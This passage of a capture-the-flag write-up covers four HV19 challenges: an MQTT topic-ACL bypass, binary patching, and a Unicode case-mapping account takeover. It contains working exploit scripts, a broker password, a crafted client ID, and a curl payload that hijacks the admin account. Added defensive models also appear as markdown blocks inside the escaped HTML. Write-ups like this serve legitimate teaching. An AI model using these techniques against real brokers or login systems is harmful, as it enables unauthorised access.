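    # MIME::Base64 tolerates missing padding; Python needs the '=' appended
    return [struct.unpack(">H", base64.b64decode(g + "=")[:2])[0] for g in groups]


def generator(seed=SEED):
    """$PMMtQJOcHm8eFQfdsdNAS20: state = state * 16807 mod 2**32, returns the new state."""
    state = seed
    while True:
        state = (state * MULTIPLIER) & 0xFFFFFFFF
        yield state


def recover_flag(words=None, seed=SEED):
    """Replay each $T->() call: the first two draws place the text on the canvas,
    the third masks the word (pack 'n', $fff[$i++] ^ (draw & 0xDEAD)).  This
    draw order is what the write-up preserves when it reorders the Perl code."""
    words = ciphertext_words() if words is None else words
    draws = generator(seed)
    flag = b""
    for w in words:
        next(draws)                      # x = draw % 600 + 20 (not needed here)
        next(draws)                      # y = draw % 440 + 20
        flag += struct.pack(">H", w ^ (next(draws) & 0xDEAD))
    return flag


if __name__ == "__main__":
    print(recover_flag().decode("latin-1"))
```

Running the block prints the same 90-character flag the game reveals part by part; the 45 decoded words match the script's stop condition (`$S9cXJIGB0BWce > 44`), which is a useful sanity check when porting obfuscated code like this.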
We then only have to note down the characters.\n<br\/>\n<br\/>It is even more convenient if we additionally make the following adjustment:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    $T = sub {\n        $vMnyQdAkfgIIik-&gt;delete($t);\n        $w = $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20; # added\n        $h = $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20; # added\n        $txt = $d28Vt03MEbdY0-&gt;(); # added\n        $t = $vMnyQdAkfgIIik-&gt;createText(\n            $w,#$PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20,\n            $h,#$PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20,\n            \"-text\" =&gt; $txt,#$d28Vt03MEbdY0-&gt;(),\n            \"-$y\"   =&gt; $z\n        );\n        print($txt); # added\n    }\n...<\/pre>\n<br\/>This way the flag gets printed out in the console. Ensure that the two calls determining the position of the text (<code>$PMMtQJOcHm8eFQfdsdNAS20->()<\/code>) remain before the call that fetches the actual text (<code>$d28Vt03MEbdY0->()<\/code>), since all three consume values from the same generator.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\\x20\\n^&&s[(.)(..)][\\2\\1]g;s%4(...)%\"p$1t\"%ee}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.15\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.15 - Santa's&nbsp;Workshop<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_15.png\" \/><\/td><td style=\"color:#333333\">Author: inik & avarx<\/td><\/tr><tr><td colspan=\"2\">The Elves are working very hard.\n<br\/>Look at <span class=\"link\">http:\/\/whale.hacking-lab.com:2080\/<\/span> to see how busy they are.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to a website showing how many gifts the elves have built so far:\n<br\/>\n<br\/><img decoding=\"async\" 
src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/15_01_gifts.png\" width=\"700px\"\/>\n<br\/>\n<br\/>The number is constantly increasing.\n<br\/>\n<br\/>By inspecting the source code, we can see that the website is using <a href=\"https:\/\/en.wikipedia.org\/wiki\/MQTT\" rel=\"noopener noreferrer\" target=\"_blank\">MQTT<\/a> over WebSockets to retrieve the number of gifts built.\n<br\/>\n<br\/>The file <code>config.js<\/code> contains the configuration used:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">var mqtt;\nvar reconnectTimeout = 100;\nvar host = 'whale.hacking-lab.com';\nvar port = 9001;\nvar useTLS = false;\nvar username = 'workshop';\nvar password = '2fXc7AWINBXyruvKLiX';\nvar clientid = localStorage.getItem(\"clientid\");\nif (clientid == null) {\n  clientid = ('' + (Math.round(Math.random() * 1000000000000000))).padStart(16, '0');\n  localStorage.setItem(\"clientid\", clientid);\n}\nvar topic = 'HV19\/gifts\/'+clientid;\n\/\/ var topic = 'HV19\/gifts\/'+clientid+'\/flag-tbd';\nvar cleansession = true;<\/pre>\n<br\/>Accordingly the number of gifts built can be retrieved by subscribing to the topic <code>'HV19\/gifts\/'+clientid<\/code>. 
The flag seems to be retrievable through a subtopic: <code>'HV19\/gifts\/'+clientid+'\/flag-tbd'<\/code>.\n<br\/>\n<br\/>We can use the configuration within a Python script to retrieve the number of gifts built using the <a href=\"https:\/\/pypi.org\/project\/paho-mqtt\/\" rel=\"noopener noreferrer\" target=\"_blank\">paho-mqtt Python module<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python3\n\nimport paho.mqtt.client as mqtt\n\n# called once the broker has accepted our connection\ndef on_connect(client, userdata, flags, rc):\n    print('connected')\n    client.subscribe('#')\n\n# called for every message on a topic we are subscribed to\ndef on_message(client, userdata, msg):\n    print('['+msg.topic+']')\n    print(msg.payload)\n\n# same broker, credentials and transport as config.js; the client ID is arbitrary\nclient = mqtt.Client(client_id='03133731337',transport=\"websockets\")\nclient.username_pw_set('workshop', '2fXc7AWINBXyruvKLiX')\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('whale.hacking-lab.com', 9001, 60)\nclient.loop_forever()<\/pre>\n<br\/>For the <code>client_id<\/code> we can choose any random value. By using the wildcard <code>#<\/code> within the subscription, we subscribe to all topics we have access to (in this case only the number of gifts built).\n<br\/>\n<br\/>Running the script retrieves the number of gifts built:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getGifts.py\nconnected\n[HV19\/gifts\/03133731337]\nb'7347537'\n[HV19\/gifts\/03133731337]\nb'7347538'\n[HV19\/gifts\/03133731337]\nb'7347541'\n...<\/pre>\n<br\/>MQTT brokers provide special system messages (the <code>$SYS<\/code> topics), which are not received by subscribing to the wildcard <code>#<\/code>. 
In order to receive these system messages, we must subscribe to <code>$SYS\/#<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    client.subscribe('$SYS\/#')\n...<\/pre>\n<br\/>The system message <code>$SYS\/broker\/version<\/code> provides a hint:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getSysMessages.py\nconnected\n[$SYS\/broker\/version]\nb'mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)'<\/pre>\n<br\/>The mentioned <a href=\"https:\/\/bugs.eclipse.org\/bugs\/show_bug.cgi?id=516765\" rel=\"noopener noreferrer\" target=\"_blank\">CVE-2017-7650<\/a> concerns pattern-based ACLs. <a href=\"https:\/\/bugs.eclipse.org\/bugs\/attachment.cgi?id=268603&#038;action=diff\" rel=\"noopener noreferrer\" target=\"_blank\">The fix for the CVE<\/a> rejects the characters <code>+<\/code>, <code>#<\/code> and <code>\/<\/code> within the client ID as well as the username, since these characters have a special meaning within a topic. A pattern-based ACL can contain placeholders, e.g. the identifier <code>%c<\/code> for the client ID, which is replaced with the current client ID. If the client ID contains one of the mentioned special characters, the semantics of the ACL may change.\n<br\/>\n<br\/>Since the topic at which we can retrieve the number of gifts built contains our client ID, the ACL in place probably looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">pattern read HV19\/gifts\/%c<\/pre>\n<br\/>The official patch linked above rejects any of the characters <code>+#\/<\/code> within the client ID and username. As stated within the hint, the elves implemented their own patch. 
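To make the ACL mechanics concrete, here is a small Python model (an added example, not part of the write-up or of mosquitto): it expands a pattern ACL for a given client ID, applies MQTT topic-filter matching, and compares the upstream CVE-2017-7650 check with a check that only inspects the first character, which is the behaviour the rest of this section finds on the challenge broker. The ACL line, the sample topics and the two check functions are constructed for the example; only the `%c` placeholder and the `+#/` character set come from the page.

```python
# Pattern ACL the write-up infers for the challenge broker (assumed, mosquitto syntax)
ACL_PATTERN = "pattern read HV19/gifts/%c"

# Constructed sample topics; the flag-tbd subtopic is the one hinted at in config.js
TOPICS = [
    "HV19/gifts/03133731337",
    "HV19/gifts/03133731337/flag-tbd",
    "HV19/gifts/other-client",
]


def expand_pattern(pattern_line, client_id, username=""):
    """Substitute %c (client ID) and %u (username) into 'pattern <access> <topic>'.
    Returns (access, topic_filter).  No escaping happens: a client ID that
    contains '/' or '#' becomes part of the filter's structure."""
    _, access, topic = pattern_line.split(" ", 2)
    return access, topic.replace("%c", client_id).replace("%u", username)


def topic_matches(topic_filter, topic):
    """MQTT topic-filter matching: '+' matches exactly one level, '#' matches
    the remaining levels (including none) and is only valid as the last level."""
    f_levels, t_levels = topic_filter.split("/"), topic.split("/")
    for i, fl in enumerate(f_levels):
        if fl == "#":
            return i == len(f_levels) - 1
        if i >= len(t_levels) or (fl != "+" and fl != t_levels[i]):
            return False
    return len(f_levels) == len(t_levels)


def upstream_check(client_id):
    """The CVE-2017-7650 fix: refuse '+', '#' and '/' anywhere in the client ID."""
    return not any(c in client_id for c in "+#/")


def first_char_only_check(client_id):
    """Model of an insufficient fix that looks at the first character only."""
    return client_id[:1] not in ("+", "#")


def readable_topics(client_id, check, topics=TOPICS, acl=ACL_PATTERN):
    """Topics a client with this ID may read: nothing if the check refuses the
    connection, otherwise everything the expanded pattern grants read on."""
    if not check(client_id):
        return []
    access, topic_filter = expand_pattern(acl, client_id)
    if access != "read":
        return []
    return [t for t in topics if topic_matches(topic_filter, t)]
```

The model shows why the fix has to reject the separator characters anywhere in the ID: once a `/` and a trailing `#` reach the pattern, the per-client filter silently becomes a multi-level wildcard under that client's prefix. Validating identifiers that are interpolated into ACLs, and logging rejected client IDs at connect time, is the defensive takeaway.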
By trying different client IDs we can figure out that the characters <code>#<\/code> and <code>+<\/code> are only rejected if they appear as the first character of the client ID. If we use the client ID <code>\"xyz\/#\"<\/code>, the expanded pattern-based ACL would look like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">pattern read HV19\/gifts\/xyz\/#<\/pre>\n<br\/>Accordingly we would have read access to all topics beneath <code>HV19\/gifts\/xyz\/...<\/code>, including the flag.\n<br\/>\n<br\/>So let's give it a shot using our previously used client ID (the ID has to have been used once before):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nclient = mqtt.Client(client_id='03133731337\/#',transport=\"websockets\")\n...<\/pre>\n<br\/>Running the script actually reveals the flag, which is placed within the topic's name:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/15# .\/getFlag.py\nconnected\n[HV19\/gifts\/03133731337\/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}]\nb'Congrats, you got it. 
The elves should not overrate their smartness!!!'<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.16\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.16 - B0rked&nbsp;Calculator<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_16.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa has coded a simple project for you, but sadly he removed all the operations.\n<br\/>But when you restore them it will print the flag!\n<br\/>\n<br\/><span class=\"link\">HV19.16-b0rked.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a 32-bit PE binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/16# unzip 9b90c573-d530-401b-b3f8-24454bbf015e.zip \nArchive:  9b90c573-d530-401b-b3f8-24454bbf015e.zip\n  inflating: b0rked.exe              \nroot@kali:~\/hv19\/16# file b0rked.exe \nb0rked.exe: PE32 executable (GUI) Intel 80386, for MS Windows<\/pre>\n<br\/>So let's boot up a Windows machine and have a look at it. The calculator allows us to enter two numbers and an operation (<code>+<\/code>, <code>-<\/code>, <code>*<\/code> and <code>\/<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_01_calc.png\" \/>\n<br\/>\n<br\/>As already stated in the description, the actual implementation of the operations has been removed. Beneath the input fields some obviously garbled text is displayed. 
This is probably the flag, which will be displayed correctly once we implement the removed operations.\n<br\/>\n<br\/>Let's have a look at the disassembly of the binary using <code>x64dbg<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_02_ops.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The above part of the disassembly shows the conditional calls to the appropriate function based on the selected operation.\n<br\/>\n<br\/>When we inspect the disassembly of these functions, we can see that the implementation has been overwritten with <code>nops<\/code> (<code>0x90<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_03_placeholder.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Accordingly our task is to replace the <code>nops<\/code> with the appropriate implementation in order to get the flag printed correctly.\n<br\/>\n<br\/>The first operation is add (<code>+<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nnop \nnop \nnop \nleave \nret 8\n<\/pre>\n<br\/>The author kindly left a starting point by not removing the first relevant instruction: <code>mov eax,dword ptr ss:[ebp+8]<\/code>. By setting a breakpoint, entering some input and inspecting the stack at the time of the call to this function, we can see that <code>dword ptr ss:[ebp+8]<\/code> contains the first number entered and <code>dword ptr ss:[ebp+0xc]<\/code> contains the second number. Because of the remaining instruction, <code>eax<\/code> already contains the first number. Accordingly we only have to add the instruction <code>add eax,dword ptr[ebp+0xc]<\/code> in order to add the second number to <code>eax<\/code>, which will hold the final result. 
Within <code>x64dbg<\/code> we can select the line of the first <code>nop<\/code> and hit <code>SPACE<\/code> to apply a patch to the binary:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_04_patch.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The patched implementation for add (<code>+<\/code>) now looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nadd eax,dword ptr ss:[ebp+C]\nleave \nret 8<\/pre>\n<br\/>As we can see, the operation now works and we already get parts of the flag printed beneath the text fields:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_05_add.png\" \/>\n<br\/>\n<br\/>The second operation to implement is sub (<code>-<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nmov ecx,dword ptr ss:[ebp+C]\nnop \nnop \nleave<\/pre>\n<br\/>Again an instruction remains, which moves the second number to <code>ecx<\/code>. 
Accordingly we only need to move the first number to <code>eax<\/code> beforehand and subtract <code>ecx<\/code> from <code>eax<\/code> at the end:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nsub eax,ecx\nleave \nret 8<\/pre>\n<br\/>The next operation is mul (<code>*<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nleave \nret 8<\/pre>\n<br\/>This time no instruction was left, but we already know from the previous operations what to do: move the first number to <code>eax<\/code>, the second to <code>ecx<\/code> and then multiply both registers (<code>mul ecx<\/code> leaves the low 32 bits of the product in <code>eax<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nmul ecx\nleave \nret 8<\/pre>\n<br\/>The last operation is div (<code>\/<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nleave \nret 8<\/pre>\n<br\/>The first two instructions stay the same. 
Before the <code>div<\/code> instruction we additionally zero out <code>edx<\/code> (<code>xor edx, edx<\/code>), since <code>div<\/code> divides the 64-bit value <code>EDX:EAX<\/code> by the given register and stores the quotient in <code>eax<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nxor edx, edx\ndiv ecx\nleave <\/pre>\n<br\/>After all missing implementations are fixed, the flag is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_06_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{B0rked_Flag_Calculat0r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.17\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.17 - Unicode&nbsp;Portal<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_17.png\" \/><\/td><td style=\"color:#333333\">Author: scryh<\/td><\/tr><tr><td colspan=\"2\">Buy your special gifts online, but for the ultimate gift you have to become admin.\n<br\/>\n<br\/><span class=\"link\">http:\/\/whale.hacking-lab.com:8881\/<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>Since the challenge was created by myself, I was really curious about how other people would like it and the way they would solve it. Unfortunately the live server was running a slightly different version of MySQL than the one I used to create the challenge, which meant the intended solution did not work at the beginning. This also enabled an unintended solution (see below), which is slightly different from the intended one. 
Despite this rusty start the challenge went as planned and I got quite good feedback.\n<br\/>\n<br\/>The provided link within the challenge's description leads to <code>santa's unicode portal<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_01_page.png\" width=\"800px\"\/>\n<br\/>\n<br\/>On the <code>register<\/code> page a new account can be created:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_02_register.png\" width=\"800px\"\/>\n<br\/>\n<br\/>After logging in with a freshly created account, the <code>symbols<\/code> page is accessible:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_03_symbols.png\" width=\"800px\"\/>\n<br\/>\n<br\/>Also the authentication source code can be viewed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_04_code.png\" width=\"800px\"\/>\n<br\/>\n<br\/>The goal of the challenge is to get access to the <code>admin<\/code> page, which cannot be accessed by default users:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_05_admin.png\" width=\"800px\"\/>\n<br\/>\n<br\/>In order to get access to the <code>admin<\/code> page, our username must be <code>santa<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Determines if the given user is admin.\n *\/\nfunction isAdmin($username) {\n  return ($username === 'santa');\n}<\/pre>\n<br\/>The user <code>santa<\/code> cannot be registered, because it already exists (with a strong password, which is not supposed to be guessed, cracked or brute-forced).\n<br\/>\n<br\/>Nevertheless the password of the user <code>santa<\/code> can be changed by evading the check made by the <code>isUsernameAvailable<\/code> 
function.\n<br\/>\n<br\/>This function converts the username to lowercase and checks whether a byte-for-byte identical (<code>BINARY<\/code>) lowercase username already exists in the database:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Determines if the given username is already taken.\n *\/\nfunction isUsernameAvailable($conn, $username) {\n  $usr = $conn-&gt;real_escape_string($username);\n  $res = $conn-&gt;query(\"SELECT COUNT(*) AS cnt FROM users WHERE LOWER(username) = BINARY LOWER('\".$usr.\"')\");\n  $row = $res-&gt;fetch_assoc();\n  return (int)$row['cnt'] === 0;\n}<\/pre>\n<br\/>If a username is available, the function <code>registerUser<\/code> is called, which converts the username to uppercase and stores it in the database:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Registers a new user.\n *\/\nfunction registerUser($conn, $username, $password) {\n  $usr = $conn-&gt;real_escape_string($username);\n  $pwd = password_hash($password, PASSWORD_DEFAULT);\n  $conn-&gt;query(\"INSERT INTO users (username, password) VALUES (UPPER('\".$usr.\"'),'\".$pwd.\"') ON DUPLICATE KEY UPDATE password='\".$pwd.\"'\");\n}<\/pre>\n<br\/>This can be exploited by leveraging the fact that certain Unicode characters (the theme of the portal should be a broad hint) end up as actual ASCII characters when converted to lowercase or uppercase.\n<br\/>\n<br\/>For example the Unicode character <a href=\"https:\/\/www.compart.com\/en\/unicode\/U+017F\" rel=\"noopener noreferrer\" target=\"_blank\">U+017F<\/a> (LATIN SMALL LETTER LONG S, UTF-8: <code>0xC5 0xBF<\/code>) ends up as an uppercase <code>S<\/code> when converted to uppercase, while it stays unchanged when converted to lowercase.\n<br\/>\n<br\/>This means that we can register the username <code>%c5%bfanta<\/code>, which passes the check of <code>isUsernameAvailable<\/code>, because its lowercase form does not equal <code>santa<\/code>. 
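The case-mapping trick can be reproduced without MySQL. The Python below is an added example, not the portal's code: it models the vulnerable pair of functions (a byte-exact comparison of the lowercased name, then storage of the uppercased name) and a hardened variant that checks and stores one canonical form. The user set is constructed; Python's str.upper and str.casefold stand in for MySQL's UPPER and LOWER, which the write-up shows behave the same way for U+017F.

```python
import unicodedata

LONG_S = chr(0x017F)   # U+017F LATIN SMALL LETTER LONG S, UTF-8 0xC5 0xBF


def is_username_available_vulnerable(username, users):
    """Model of isUsernameAvailable: LOWER(username) = BINARY LOWER(input), a
    byte-exact comparison of the lowercased forms (stored names are uppercase)."""
    wanted = username.lower().encode("utf-8")
    return all(u.lower().encode("utf-8") != wanted for u in users)


def register_vulnerable(username, users):
    """Model of the registration flow on the page: availability check, then
    INSERT ... UPPER(username) ... ON DUPLICATE KEY UPDATE password.
    Returns what happened to the (constructed) users table."""
    if not is_username_available_vulnerable(username, users):
        return "rejected"
    key = username.upper()              # registerUser stores UPPER(username)
    if key in users:
        return "password-overwritten"   # duplicate key: existing row's password updated
    users.add(key)
    return "inserted"


def canonical(username):
    """Single canonical form used for both the check and the stored value:
    NFKC normalisation followed by Unicode case folding (U+017F folds to 's')."""
    return unicodedata.normalize("NFKC", username).casefold()


def register_hardened(username, users):
    """Hardened variant: restrict usernames to ASCII letters and digits, and
    compare exactly the form that will be stored, so no lookalike can pass
    the check and then collide on insert."""
    if not username.isascii() or not username.isalnum():
        return "rejected"
    key = canonical(username)
    if key in users:
        return "rejected"
    users.add(key)
    return "inserted"
```

The root cause is that the availability check and the stored value use different transformations (LOWER with a binary comparison versus UPPER); any pair of functions that disagree on what "the same name" means leaves a gap for characters whose case mappings are not reversible. The hardened version also refuses the trailing-space variant, since a space is neither a letter nor a digit.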
After being converted to uppercase by the <code>registerUser<\/code> function, however, the username inserted into the database is <code>SANTA<\/code>, which means that effectively the password for the username <code>santa<\/code> is updated (<code>... ON DUPLICATE KEY UPDATE password ...<\/code>).\n<br\/>\n<br\/>Thus we only have to register the username <code>%c5%bfanta<\/code> and set a password of our choice:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hv17# curl http:\/\/whale.hacking-lab.com:8881\/\/register.php -d 'username=%c5%bfanta&pwd=mySecretPwd&pwd2=mySecretPwd'\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n...\n&lt;center&gt;\n&lt;h3&gt;Registration successful!&lt;\/h3&gt;\n&lt;h4&gt;You will be redirected to the login page ...&lt;\/h4&gt;\n&lt;\/center&gt;\n...\n<\/pre>\n<br\/>Now we can log in with the username <code>santa<\/code> and the password <code>mySecretPwd<\/code> and access the admin page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_06_flag.png\" width=\"800px\"\/>\n<br\/>\n<br\/>The unintended solution, which nevertheless worked on the MySQL version in place, is basically the same, but registers the user <code>'santa '<\/code> (with a trailing space).\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{h4v1ng_fun_w1th_un1c0d3}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.18\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.18 - Dance&nbsp;with&nbsp;me<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_18.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa had some fun and created today's present with a special dance. 
This is what he made up for you:\n<br\/><pre>096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15<\/pre>Dance with him to recover the flag.\n<br\/>\n<br\/><span class=\"link\">HV19-dance.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a Debian binary package:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# unzip 93d0df60-3579-4672-8efc-f32327d3643f.zip\nArchive:  93d0df60-3579-4672-8efc-f32327d3643f.zip\n  inflating: dance\nroot@kali:~\/hv19\/18# file dance\ndance: Debian binary package (format 2.0)<\/pre>\n<br\/>The package can be extracted using <code>ar<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# ar -xv dance\nx - debian-binary\nx - control.tar.gz\nx - data.tar.lzma<\/pre>\n<br\/>The file <code>data.tar.lzma<\/code> contains the actual binary, which is a <code>Mach-O<\/code> universal binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# tar -xvf data.tar.lzma\n.\n.\/usr\nusr\/bin\nusr\/bin\/dance\nroot@kali:~\/hv19\/18# file usr\/bin\/dance\nusr\/bin\/dance: Mach-O universal binary with 3 architectures: [armv7:Mach-O armv7 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;] [arm64:Mach-O 64-bit arm64 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;] [arm64:Mach-O 64-bit arm64 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;]<\/pre>\n<br\/>The binary can be analyzed using <code>ghidra<\/code>:\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/18_01_ghidra.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Within the <code>main<\/code> function the user is prompted to enter the flag. 
The input entered is then passed along with some other parameters to a function called <code>_dance<\/code>. Within this function <code>_dance_block<\/code> is called, which in turn calls <code>_dance_words<\/code>. At the end of the <code>main<\/code> function the obviously encrypted input is printed in hex. Since the challenge description provides a hex value, this is probably the encrypted flag.\n<br\/>\n<br\/>By googling for the value <code>0x79622d32<\/code> taken from within the function <code>_dance_block<\/code> I found an implementation of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Salsa20\" rel=\"noopener noreferrer\" target=\"_blank\">Salsa20<\/a> algorithm, which uses this value as a constant. In combination with the name of the challenge and the names of the functions this makes perfect sense.\n<br\/>\n<br\/>By default Salsa20 uses a 32-byte key and an 8-byte nonce. If the binary encrypts the input using this algorithm, we just need to get the key and nonce from it and decrypt the encrypted flag from the challenge's description.\n<br\/>\n<br\/>Using <a href=\"https:\/\/pycryptodome.readthedocs.io\/en\/latest\/src\/cipher\/salsa20.html\" rel=\"noopener noreferrer\" target=\"_blank\">PyCryptodome<\/a> for Python we can try to decrypt the flag using the key and nonce from the 